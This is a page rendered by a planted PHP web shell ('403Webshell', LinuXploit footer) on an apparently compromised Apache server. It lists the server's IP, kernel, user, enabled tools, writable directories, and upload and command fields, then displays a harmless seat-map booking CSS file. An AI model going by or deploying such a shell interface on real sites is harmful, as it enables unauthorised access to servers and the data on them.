403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/b2bzend/public/assets/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/b2bzend/public/assets/css/seatmap_new.css
/*seatmap css code*/
.seatmap_box {
    padding: 30px 20px 30px 20px;
    text-align: center;
    vertical-align: top;
    display: inline-block;
    border-right: solid 1px #bcc8d1;
    border-left: 1px solid #bcc8d1;
    width: 100%;
    font-family: Roboto, sans-serif;
    background: #f6f6f6;
}

.selectflight {
    width: 50%;
    float: left;
}

.select_padding_0 {
    padding-left: 0px !important;
    padding-right: 0px !important;
}

.selectseatfee {
    width: 100%;
    margin: 0;
    padding: 0;
}

.selectseatfee .fee_head {
    font-size: 14px;
    color: #9b9b9b;
    text-align: left;
    width: 100%;
    display: block;
    font-weight: 500;
}

.selectseatfee ul {
    margin: 0;
    padding: 0;
}

.selectseatfee ul li {
    font-size: 15px;
    color: #9b9b9b;
    line-height: 20px;
    padding: 10px 0 0;
    margin: 0;
    list-style-type: none;
}

.selectseatfee ul li .status_pink {
    width: 20px;
    height: 20px;
    background: #e4c8c8;
    padding: 10px 0;
    margin: 0;
}

.selectseatfee ul li .status_darkpink {
    width: 20px;
    height: 20px;
    background: #806a7d;
    padding: 10px 0 0;
    margin: 0;
}

.seat_boxalign {
    float: left;
    margin-right: 5px !important;
}


.selectstatue {
    width: 100%;
    margin: 20px 0;
    padding: 0;
}

.selectstatue .status_head {
    font-size: 14px;
    color: #9b9b9b;
    text-align: left;
    width: 100%;
    display: block;
    font-weight: 500;
}

.selectstatue ul {
    margin: 0;
    padding: 0;
}

.selectstatue ul li {
    font-size: 15px;
    color: #9b9b9b;
    line-height: 20px;
    padding: 10px 0 0;
    margin: 0;
    list-style-type: none;
}

.selectstatue ul li .status_green {
    width: 20px;
    height: 20px;
    background: #4aa301;
    padding: 10px 0;
    margin: 0;
}

.selectstatue ul li .status_grey {
    width: 20px;
    height: 20px;
    background: #a4b4c1;
    padding: 10px 0 0;
    margin: 0;
}

.select_orientation {
    width: 100%;
    margin: 0;
    padding: 0 0 20px 0;
    text-align: center;
    border-bottom: 1px solid #d7d7d7;
}

.select_orientation .select_orintationhead {
    font-size: 14px;
    color: #9b9b9b;
    text-align: left;
    width: 100%;
    display: block;
    font-weight: 500;
}

.select_orientation img {
    margin: 10px 0;
    padding: 0;
}

.selectsaet-box {
    width: 100%;
    margin: 0;
    padding: 0 0 20px 0;
    text-align: center;
    border-bottom: 1px solid #d7d7d7;
}

.selectsaet-title {
    font-size: 17px;
    color: #5d5c5c;
    text-align: left;
    width: 100%;
    display: block;
    font-weight: normal;
    margin-bottom: 7px;
}

.selectseatimage {
    float: left;
    width: auto;
    height: 30px;
    margin-right: 8px;
}

.alignleft {
    float: left;
    margin: 0 5px 0 0;
    font-size: 14px;
    width: 55px;
    line-height: 15px;
}

.alignflightdesti {
    text-align: left;
    margin-top: 0px;
}

.passenger_details {
    width: 100%;
    margin: 10px 0;
    padding: 0;
}

.passenger_details ul {
    margin: 0;
    padding: 0;
}

.passenger_details ul li {
    margin: 0;
    padding: 0;
    list-style-type: none;
    font-size: 14px;
    color: #5d5c5c;
    text-align: center;
    line-height: 23px;
}

.passenger_details ul li .firstcolumn {
    margin: 0;
    padding: 0;
    width: 40%;
    float: left;
}

.passenger_details ul li .secondcolumn {
    margin: 0;
    padding: 0;
    width: 18%;
    float: left;
}

.passenger_details ul li .thirdcolumn {
    margin: 0;
    padding: 0;
    width: 40%;
    float: left;
}

.proceedtext {
    width: 100%;
    margin: 0;
    padding: 0;
}

.proceedtext_head {
    color: #ec6837;
}


.proceedtext_content {
    font-size: 13px;
    color: #717171;
    line-height: 19px;
    text-align: justify;
}

.continue_seatbtn {
    border-radius: 0px;
    margin: 10px 0 0;
    background-color: var(--highlight-color);
    border-color: var(--highlight-color);
    /*color: #fff !important;*/
    /*changes to wowidays*/
    color: #fff;
    font-family: Roboto, sans-serif;
    font-size: 15px;
    padding: 8px 0px;
    width: 100%;
    display: block;
    text-align: center;
    margin-bottom: 10px;
    text-decoration: none;
}

@media (max-width: 992px) {
    .select_orientation {
        width: 100%;
        margin: 0;
        padding: 0 0 20px 0;
        text-align: left;
        border-bottom: 1px solid #d7d7d7;
    }

    .seatmap_box {
        padding: 30px 0 30px 0;
        text-align: center;
        vertical-align: top;
        display: inline-block;
        border-right: solid 1px #bcc8d1;
        border-left: 1px solid #bcc8d1;
        width: 100%;
    }
}


.Table {
    display: table;
    background: #fff;
    width: 82%;
    margin: 0 auto;
}

.Title {
    display: table-caption;
    text-align: center;
    font-weight: bold;
    font-size: larger;
}

.Heading {
    display: table-row;
    font-weight: bold;
    text-align: center;
}

.Row {
    display: table-row;
}

.Cell,
.CellSelected {
    display: table-cell;
    border: solid 1px white;
    border-width: thin;
    padding-left: 8px;
    padding-right: 8px;
    text-align: center;
    height: 35px;
    line-height: 33px;
    color: #fff;
    cursor: pointer;
    background: #cdf;
    border-radius: 5px;
    width: 48px;
}

.CellBoked {
    display: table-cell;
    border: solid 1px white;
    border-width: thin;
    padding-left: 8px;
    padding-right: 8px;
    text-align: center;
    height: 35px;
    line-height: 33px;
    cursor: not-allowed;
    color: #fff;
    border-radius: 5px;
    width: 48px;
}

.Cell_text {
    font-size: 14px;
    line-height: 33px;
}

.Cell_empty {
    margin-top: 2px;
    border: solid 1px transparent;
    padding-left: 18px;
    padding-right: 18px;
    text-align: center;
    width: 48px;
}

.CellSelected {
    background: #4aa301 !important;
}

.RightPadding {
    margin-right: 20px;
}

.toolcss {
    padding: 0px !important;
    line-height: 10px;
    text-align: center;
    font-size: 14px;
}

.CellTypeC {
    margin-right: 23px;
    display: block;
}

.EmptyCellBox {
    display: table-cell;
    border: solid 1px white;
    border-width: thin;
    padding-left: 8px;
    padding-right: 8px;
    text-align: center;
    height: 35px;
    line-height: 32px;
    color: #fff;
    cursor: pointer;
    background: #fff;
    border-radius: 5px;
    width: 48px;
}

/*seatmap css code*/

Youez - 2016 - github.com/yon3zu
LinuXploit